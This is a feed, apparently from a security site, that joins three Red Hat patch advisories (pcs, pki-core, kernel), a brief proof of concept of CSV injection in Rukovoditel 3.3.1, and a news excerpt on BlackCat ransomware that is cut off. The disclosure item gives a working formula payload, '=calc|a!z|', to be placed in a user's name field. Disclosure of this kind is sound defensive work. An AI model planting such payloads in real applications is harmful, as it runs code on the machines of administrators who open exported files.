Red Hat Security Advisory 2023-3403-01 - The pcs packages provide a command-line configuration system for the Pacemaker and Corosync utilities. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: pcs security and bug fix update  
Advisory ID:       RHSA-2023:3403-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3403  
Issue date:        2023-05-31  
CVE Names:         CVE-2023-27530 CVE-2023-27539   
=====================================================================

1. Summary:

An update for pcs is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux High Availability EUS (v.8.6) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Resilient Storage EUS (v.8.6) - ppc64le, s390x, x86_64

3. Description:

The pcs packages provide a command-line configuration system for the  
Pacemaker and Corosync utilities.

Security Fix(es):

* rubygem-rack: Denial of service in Multipart MIME parsing  
(CVE-2023-27530)

* rubygem-rack: denial of service in header parsing (CVE-2023-27539)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Command 'pcs config checkpoint diff' does not show configuration  
differences between checkpoints (BZ#2180702)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2176477 - CVE-2023-27530 rubygem-rack: Denial of service in Multipart MIME parsing  
2179649 - CVE-2023-27539 rubygem-rack: denial of service in header parsing  
2180702 - Command 'pcs config checkpoint diff' does not show configuration differences between checkpoints [rhel-8.6.0.z]

6. Package List:

Red Hat Enterprise Linux High Availability EUS (v.8.6):

Source:  
pcs-0.10.12-6.el8_6.4.src.rpm

aarch64:  
pcs-0.10.12-6.el8_6.4.aarch64.rpm  
pcs-snmp-0.10.12-6.el8_6.4.aarch64.rpm

ppc64le:  
pcs-0.10.12-6.el8_6.4.ppc64le.rpm  
pcs-snmp-0.10.12-6.el8_6.4.ppc64le.rpm

s390x:  
pcs-0.10.12-6.el8_6.4.s390x.rpm  
pcs-snmp-0.10.12-6.el8_6.4.s390x.rpm

x86_64:  
pcs-0.10.12-6.el8_6.4.x86_64.rpm  
pcs-snmp-0.10.12-6.el8_6.4.x86_64.rpm

Red Hat Enterprise Linux Resilient Storage EUS (v.8.6):

Source:  
pcs-0.10.12-6.el8_6.4.src.rpm

ppc64le:  
pcs-0.10.12-6.el8_6.4.ppc64le.rpm  
pcs-snmp-0.10.12-6.el8_6.4.ppc64le.rpm

s390x:  
pcs-0.10.12-6.el8_6.4.s390x.rpm  
pcs-snmp-0.10.12-6.el8_6.4.s390x.rpm

x86_64:  
pcs-0.10.12-6.el8_6.4.x86_64.rpm  
pcs-snmp-0.10.12-6.el8_6.4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-27530  
https://access.redhat.com/security/cve/CVE-2023-27539  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZHeVENzjgjWX9erEAQhHRxAAmz5qcKfxfTAdq6NONbqn+9EYE38v9UHc  
iX8XanLeaHarP8IMNKzXTGCWFRJ4J2RQOJuh+MCijbYhVC79R6BzDHL1LReBEoeo  
TMtzqWV6NliX4fGdJQL0Y9hZnnTaA7fNWQLHrq/Mgtk6a6KZ1oNaNxWjgBQkQWeD  
0TE8Xij/kxHtSgx8zlIogXY/2D+Y5iFqnTajeC1YZI5sQOYZhWmovwMUZ+/WqTyF  
aQMFM2U/ZPiHWx/fTRE6TUvDR/m3NoZva5w4kcF/fabUW8rvZFvp7IlzgKTRACP5  
oFt9hRMgrOpguvRu1yGYFj41jH6mRP4xxPoOgmZIK5inl02JNadEXUDhUfx5htOW  
os079YHWaEXeXRr/6myaFFC9JH8EV40wJAZxMdGPfyqAjuzbF1uRxsmwmAExsEk0  
Y8+xo9KHY4cQfT1qEJq9Otvfio26Vj/Z4Q71rHyok4KZGl3mpi3U07aDd/eNcL3s  
Q3gVQOSBuECDsBZ13QQZtANHt8o27qvvCYawUnSVhYKq0vhVYpFgoMV7AMmZXs3e  
ojyguiikuTCAsCmkEw3iA5FC9/t5v8/Ma+djzgYyTzBfgSjzeiZSj9KoayPEIVkM  
V8iuQJ3dc/47l96wIQHbSIqTqql1TQu/SjFwP5Rm0DnKJLXr1RhK5PeXdGde60NK  
uxiJFq3aKGQ=  
=QTTG  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3403-01

Red Hat Security Advisory 2023-3394-01 - The Public Key Infrastructure Core contains fundamental packages required by Red Hat Certificate System.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: pki-core:10.6 security update  
Advisory ID:       RHSA-2023:3394-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3394  
Issue date:        2023-05-31  
CVE Names:         CVE-2022-2393 CVE-2022-2414   
=====================================================================

1. Summary:

An update for the pki-core:10.6 module is now available for Red Hat  
Enterprise Linux 8.6 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The Public Key Infrastructure (PKI) Core contains fundamental packages  
required by Red Hat Certificate System.

Security Fix(es):

* pki-core: access to external entities when parsing XML can lead to XXE  
(CVE-2022-2414)

* pki-core: When using the caServerKeygen_DirUserCert profile, user can get  
certificates for other UIDs by entering name in Subject field  
(CVE-2022-2393)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2101046 - CVE-2022-2393 pki-core: When using the caServerKeygen_DirUserCert profile, user can get certificates for other UIDs by entering name in Subject field  
2104676 - CVE-2022-2414 pki-core: access to external entities when parsing XML can lead to XXE

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
jss-4.9.3-1.module+el8.6.0+14244+60d461b7.src.rpm  
ldapjdk-4.23.0-1.module+el8.5.0+11983+6ba118b4.src.rpm  
pki-core-10.12.7-1.module+el8.6.0+18623+dea80f17.src.rpm  
tomcatjss-7.7.1-1.module+el8.6.0+13291+248751b1.src.rpm

aarch64:  
jss-4.9.3-1.module+el8.6.0+14244+60d461b7.aarch64.rpm  
jss-debuginfo-4.9.3-1.module+el8.6.0+14244+60d461b7.aarch64.rpm  
jss-debugsource-4.9.3-1.module+el8.6.0+14244+60d461b7.aarch64.rpm  
jss-javadoc-4.9.3-1.module+el8.6.0+14244+60d461b7.aarch64.rpm  
pki-core-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.aarch64.rpm  
pki-core-debugsource-10.12.7-1.module+el8.6.0+18623+dea80f17.aarch64.rpm  
pki-symkey-10.12.7-1.module+el8.6.0+18623+dea80f17.aarch64.rpm  
pki-symkey-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.aarch64.rpm  
pki-tools-10.12.7-1.module+el8.6.0+18623+dea80f17.aarch64.rpm  
pki-tools-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.aarch64.rpm

noarch:  
ldapjdk-4.23.0-1.module+el8.5.0+11983+6ba118b4.noarch.rpm  
ldapjdk-javadoc-4.23.0-1.module+el8.5.0+11983+6ba118b4.noarch.rpm  
pki-acme-10.12.7-1.module+el8.6.0+18623+dea80f17.noarch.rpm  
pki-base-10.12.7-1.module+el8.6.0+18623+dea80f17.noarch.rpm  
pki-base-java-10.12.7-1.module+el8.6.0+18623+dea80f17.noarch.rpm  
pki-ca-10.12.7-1.module+el8.6.0+18623+dea80f17.noarch.rpm  
pki-kra-10.12.7-1.module+el8.6.0+18623+dea80f17.noarch.rpm  
pki-server-10.12.7-1.module+el8.6.0+18623+dea80f17.noarch.rpm  
python3-pki-10.12.7-1.module+el8.6.0+18623+dea80f17.noarch.rpm  
tomcatjss-7.7.1-1.module+el8.6.0+13291+248751b1.noarch.rpm

ppc64le:  
jss-4.9.3-1.module+el8.6.0+14244+60d461b7.ppc64le.rpm  
jss-debuginfo-4.9.3-1.module+el8.6.0+14244+60d461b7.ppc64le.rpm  
jss-debugsource-4.9.3-1.module+el8.6.0+14244+60d461b7.ppc64le.rpm  
jss-javadoc-4.9.3-1.module+el8.6.0+14244+60d461b7.ppc64le.rpm  
pki-core-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.ppc64le.rpm  
pki-core-debugsource-10.12.7-1.module+el8.6.0+18623+dea80f17.ppc64le.rpm  
pki-symkey-10.12.7-1.module+el8.6.0+18623+dea80f17.ppc64le.rpm  
pki-symkey-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.ppc64le.rpm  
pki-tools-10.12.7-1.module+el8.6.0+18623+dea80f17.ppc64le.rpm  
pki-tools-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.ppc64le.rpm

s390x:  
jss-4.9.3-1.module+el8.6.0+14244+60d461b7.s390x.rpm  
jss-debuginfo-4.9.3-1.module+el8.6.0+14244+60d461b7.s390x.rpm  
jss-debugsource-4.9.3-1.module+el8.6.0+14244+60d461b7.s390x.rpm  
jss-javadoc-4.9.3-1.module+el8.6.0+14244+60d461b7.s390x.rpm  
pki-core-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.s390x.rpm  
pki-core-debugsource-10.12.7-1.module+el8.6.0+18623+dea80f17.s390x.rpm  
pki-symkey-10.12.7-1.module+el8.6.0+18623+dea80f17.s390x.rpm  
pki-symkey-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.s390x.rpm  
pki-tools-10.12.7-1.module+el8.6.0+18623+dea80f17.s390x.rpm  
pki-tools-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.s390x.rpm

x86_64:  
jss-4.9.3-1.module+el8.6.0+14244+60d461b7.x86_64.rpm  
jss-debuginfo-4.9.3-1.module+el8.6.0+14244+60d461b7.x86_64.rpm  
jss-debugsource-4.9.3-1.module+el8.6.0+14244+60d461b7.x86_64.rpm  
jss-javadoc-4.9.3-1.module+el8.6.0+14244+60d461b7.x86_64.rpm  
pki-core-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.x86_64.rpm  
pki-core-debugsource-10.12.7-1.module+el8.6.0+18623+dea80f17.x86_64.rpm  
pki-symkey-10.12.7-1.module+el8.6.0+18623+dea80f17.x86_64.rpm  
pki-symkey-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.x86_64.rpm  
pki-tools-10.12.7-1.module+el8.6.0+18623+dea80f17.x86_64.rpm  
pki-tools-debuginfo-10.12.7-1.module+el8.6.0+18623+dea80f17.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2393  
https://access.redhat.com/security/cve/CVE-2022-2414  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZHeVAtzjgjWX9erEAQiB2A//QrQfE2CNEk7MqCukaj0nDVJwAS+V/BXU  
Z6Q1nmjxSz4BI7H8A9TKhFP1hHaovouYOxgnUnos3qEVZBnr49yjokB3wABT+UG0  
MZ7Czc9k8LT0RlBa4yIJYvnqXPoAnsXa6LBpjOmSRvNlMucK54GdNjgV9XrdOXnA  
IFHWn+Rg5/tJxBaMOcxBsnbWCAebvAT+mQakh4bDgWsCRWtJqTSogKmnKAPaTNx/  
8UQWaxfrk/7usDvoDvZUaMqbzsA5Nr+pPuGqD6h6OkC0RuBMAG3D99YPrryglmWG  
D6afkZAIPX+lNoIL2pJA2Tm2pUsHq34dgk6CCm+H7BYeHlbc4QiW+vmdxu750YuX  
I/vDilrjsDI4fxvSFt52zBdLWvPZX8Se/Pb6pJF7nziU2uSYYlatiNRLEYiP0HZc  
oebOd0GL1QBM/Ny9c+6DemHDlgc4giUmpTZGt0kVMeSkEJMnLRPf6OwXq7qDYm8J  
5iB3qUISIkS2D0fAxFqOaaLE3cgdDA/PtZFu7P5weX8maEbtd/VvuiWWts/hw9YZ  
Zim7MhHLMccepUyZkGF2kCQ01q6D7tPhHYa4t2SDObZsIag5oXoZ7cgBGD6I/AfB  
uB27gnx7Jep1J0NReNjkmSb3uWJgIXk9QmIy56o/BzTeIIcPHzWsiV3bG8a29pxu  
PeBQd7wCAIs=  
=LxBB  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3394-01

Red Hat Security Advisory 2023-3388-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include bypass and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security, bug fix, and enhancement update  
Advisory ID:       RHSA-2023:3388-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3388  
Issue date:        2023-05-31  
CVE Names:         CVE-2022-3564 CVE-2022-4378 CVE-2022-39188   
                   CVE-2022-42703   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.8.6) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux BaseOS EUS (v.8.6) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: use-after-free caused by l2cap_reassemble_sdu() in  
net/bluetooth/l2cap_core.c (CVE-2022-3564)

* kernel: stack overflow in do_proc_dointvec and proc_skip_spaces  
(CVE-2022-4378)

* kernel: unmap_mapping_range() race with munmap() on VM_PFNMAP mappings  
leads to stale TLB entry (CVE-2022-39188)

* kernel: use-after-free related to leaf anon_vma double reuse  
(CVE-2022-42703)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* An application stopped on robust futex used via pthread_mutex_lock()  
(BZ#2170055)

* dm crypt: backport flags to optionally bypass kcryptd workqueues  
(BZ#2175202)

* The qede driver changes rx-usecs: to 256 causing performance impact  
(BZ#2176106)

* Intel QAT Update - (kernel changes) (BZ#2176852)

* Concurrent NVMe scans cause panic with native multipath (BZ#2178244)

* CNB: Update TC subsystem to upstream v5.18 (BZ#2179432)

* Server crashed in  cifs_reconnect -> dfs_cache_free_tgts (BZ#2182082)

* WARNING: possible circular locking dependency detected  
cpu_partial_store+0x44/0x80 (BZ#2184771)

* "smpboot: Scheduler frequency invariance went wobbly, disabling!" on  
nohz_full CPUs after long run (BZ#2188069)

* kernel-rt: task deadline_test:2526 blocked for more than 600 seconds.  
(BZ#2188625)

* gfs2: file corruption in large data files (BZ#2188687)

Enhancement(s):

* Add support for no HWP mode into intel_pstate for Sapphire Rapids (SPR)  
(BZ#2178644)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2130141 - CVE-2022-39188 kernel: unmap_mapping_range() race with munmap() on VM_PFNMAP mappings leads to stale TLB entry  
2133483 - CVE-2022-42703 kernel: use-after-free related to leaf anon_vma double reuse  
2150999 - CVE-2022-3564 kernel: use-after-free caused by l2cap_reassemble_sdu() in net/bluetooth/l2cap_core.c  
2152548 - CVE-2022-4378 kernel: stack overflow in do_proc_dointvec and proc_skip_spaces

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.8.6):

Source:  
kernel-4.18.0-372.57.1.el8_6.src.rpm

aarch64:  
bpftool-4.18.0-372.57.1.el8_6.aarch64.rpm  
bpftool-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-core-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-cross-headers-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-debug-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-debug-core-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-debug-devel-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-debug-modules-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-debug-modules-extra-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-devel-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-headers-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-modules-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-modules-extra-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-tools-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-tools-libs-4.18.0-372.57.1.el8_6.aarch64.rpm  
perf-4.18.0-372.57.1.el8_6.aarch64.rpm  
perf-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm  
python3-perf-4.18.0-372.57.1.el8_6.aarch64.rpm  
python3-perf-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm

noarch:  
kernel-abi-stablelists-4.18.0-372.57.1.el8_6.noarch.rpm  
kernel-doc-4.18.0-372.57.1.el8_6.noarch.rpm

ppc64le:  
bpftool-4.18.0-372.57.1.el8_6.ppc64le.rpm  
bpftool-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-core-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-cross-headers-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-debug-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-debug-core-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-debug-devel-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-debug-modules-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-debug-modules-extra-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-devel-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-headers-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-modules-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-modules-extra-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-tools-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-tools-libs-4.18.0-372.57.1.el8_6.ppc64le.rpm  
perf-4.18.0-372.57.1.el8_6.ppc64le.rpm  
perf-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm  
python3-perf-4.18.0-372.57.1.el8_6.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm

s390x:  
bpftool-4.18.0-372.57.1.el8_6.s390x.rpm  
bpftool-debuginfo-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-core-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-cross-headers-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-debug-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-debug-core-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-debug-debuginfo-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-debug-devel-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-debug-modules-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-debug-modules-extra-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-debuginfo-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-debuginfo-common-s390x-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-devel-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-headers-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-modules-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-modules-extra-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-tools-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-tools-debuginfo-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-zfcpdump-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-zfcpdump-core-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-zfcpdump-debuginfo-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-zfcpdump-devel-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-zfcpdump-modules-4.18.0-372.57.1.el8_6.s390x.rpm  
kernel-zfcpdump-modules-extra-4.18.0-372.57.1.el8_6.s390x.rpm  
perf-4.18.0-372.57.1.el8_6.s390x.rpm  
perf-debuginfo-4.18.0-372.57.1.el8_6.s390x.rpm  
python3-perf-4.18.0-372.57.1.el8_6.s390x.rpm  
python3-perf-debuginfo-4.18.0-372.57.1.el8_6.s390x.rpm

x86_64:  
bpftool-4.18.0-372.57.1.el8_6.x86_64.rpm  
bpftool-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-core-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-cross-headers-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-debug-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-debug-core-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-debug-devel-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-debug-modules-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-debug-modules-extra-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-devel-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-headers-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-modules-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-modules-extra-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-tools-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-tools-libs-4.18.0-372.57.1.el8_6.x86_64.rpm  
perf-4.18.0-372.57.1.el8_6.x86_64.rpm  
perf-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm  
python3-perf-4.18.0-372.57.1.el8_6.x86_64.rpm  
python3-perf-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.8.6):

aarch64:  
bpftool-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm  
kernel-tools-libs-devel-4.18.0-372.57.1.el8_6.aarch64.rpm  
perf-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm  
python3-perf-debuginfo-4.18.0-372.57.1.el8_6.aarch64.rpm

ppc64le:  
bpftool-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm  
kernel-tools-libs-devel-4.18.0-372.57.1.el8_6.ppc64le.rpm  
perf-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-372.57.1.el8_6.ppc64le.rpm

x86_64:  
bpftool-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm  
kernel-tools-libs-devel-4.18.0-372.57.1.el8_6.x86_64.rpm  
perf-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm  
python3-perf-debuginfo-4.18.0-372.57.1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-3564  
https://access.redhat.com/security/cve/CVE-2022-4378  
https://access.redhat.com/security/cve/CVE-2022-39188  
https://access.redhat.com/security/cve/CVE-2022-42703  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZHeU+9zjgjWX9erEAQi2oQ/8CjXD50RTu/f05Wy6hXQ1WKi0RpVyivwS  
/ggH5Eda75T/a8L1zpjzr1lf00M/W3Xer1fOdUQ1j7s47ftaHz497iAZ0QquYL3T  
e8yuqTI8sHviWNVJdhqAweHHO7Q+P7a70E+Ey6LzPuKg1ytrb3qqFgZZogotMIeq  
pYHcd6LAiRnMejg8LbRRkCFBPOi+S9bGSyzVnnKQoaEt/4zpN12iLZOTOTlfWEYO  
bqzXs8vMZ41UEfqmv7IYpoE/pnRnLb77ZDNVyOUqYtEn0ny8dVn101+SNsitHnLs  
z5q6UNlcl+F3zOBvGLCraO03TqXLjKiwg6stYcny8/S6Z83FDLi7YTD87MC0XVH8  
NoaTF1c1Xsx9+lxo2+G6RU6+t2GC6AkBTO292WmGRNihTZioSZrGe/HiIXkEkyyL  
MrEevB1udkbFudeFl5UJIKT1PnVq4BHtIb5BqGMCNKIhqP5MiPiZ94D0l7qy2EzA  
OCqMrIdrucnBW88gBdtxaShniimeAxzjSVHqPZN5K1Z/o0DEg6n0zmwFCpQKgSRl  
/kSC14Bx/78OTL6+oGNd1/0z0ZcqhF1reqtvg9fJAT9uZaXcUjDtIbTsuoRbA2Db  
d3HUCdWkAFypfX0M1M77mSvhuXO1KW02ITFq18P5eLSH7qkn1boRe6lj8D2nOfO+  
Xg8eHVf7+44=  
=SiSH  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3388-01

Rukovoditel version 3.3.1 suffers from a CSV injection vulnerability.

    Exploit Title: Rukovoditel 3.3.1 - CSV injectionVersion: 3.3.1Bugs:  CSV InjectionTechnology: PHPVendor URL: https://www.rukovoditel.net/Software Link: https://www.rukovoditel.net/download.phpDate of found: 27-05-2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================Step 1. login as userstep 2. Go to My Account ( http://127.0.0.1/index.php?module=users/account )step 3. Set Firstname as  =calc|a!z|step 3. If admin Export costumers as CSV  file ,in The computer of admin  occurs csv injection and will open calculator (http://localhost/index.php?module=items/items&path=1)payload: =calc|a!z|

Rukovoditel 3.3.1 CSV Injection

The threat actors behind BlackCat ransomware have come up with an improved variant that prioritizes speed and stealth in an attempt to bypass security guardrails and achieve their goals.
The new version, dubbed Sphynx and announced in February 2023, packs a "number of updated capabilities that strengthen the group's efforts to evade detection," IBM Security X-Force said in a new analysis.
The "

Endpoint Security / Encryption

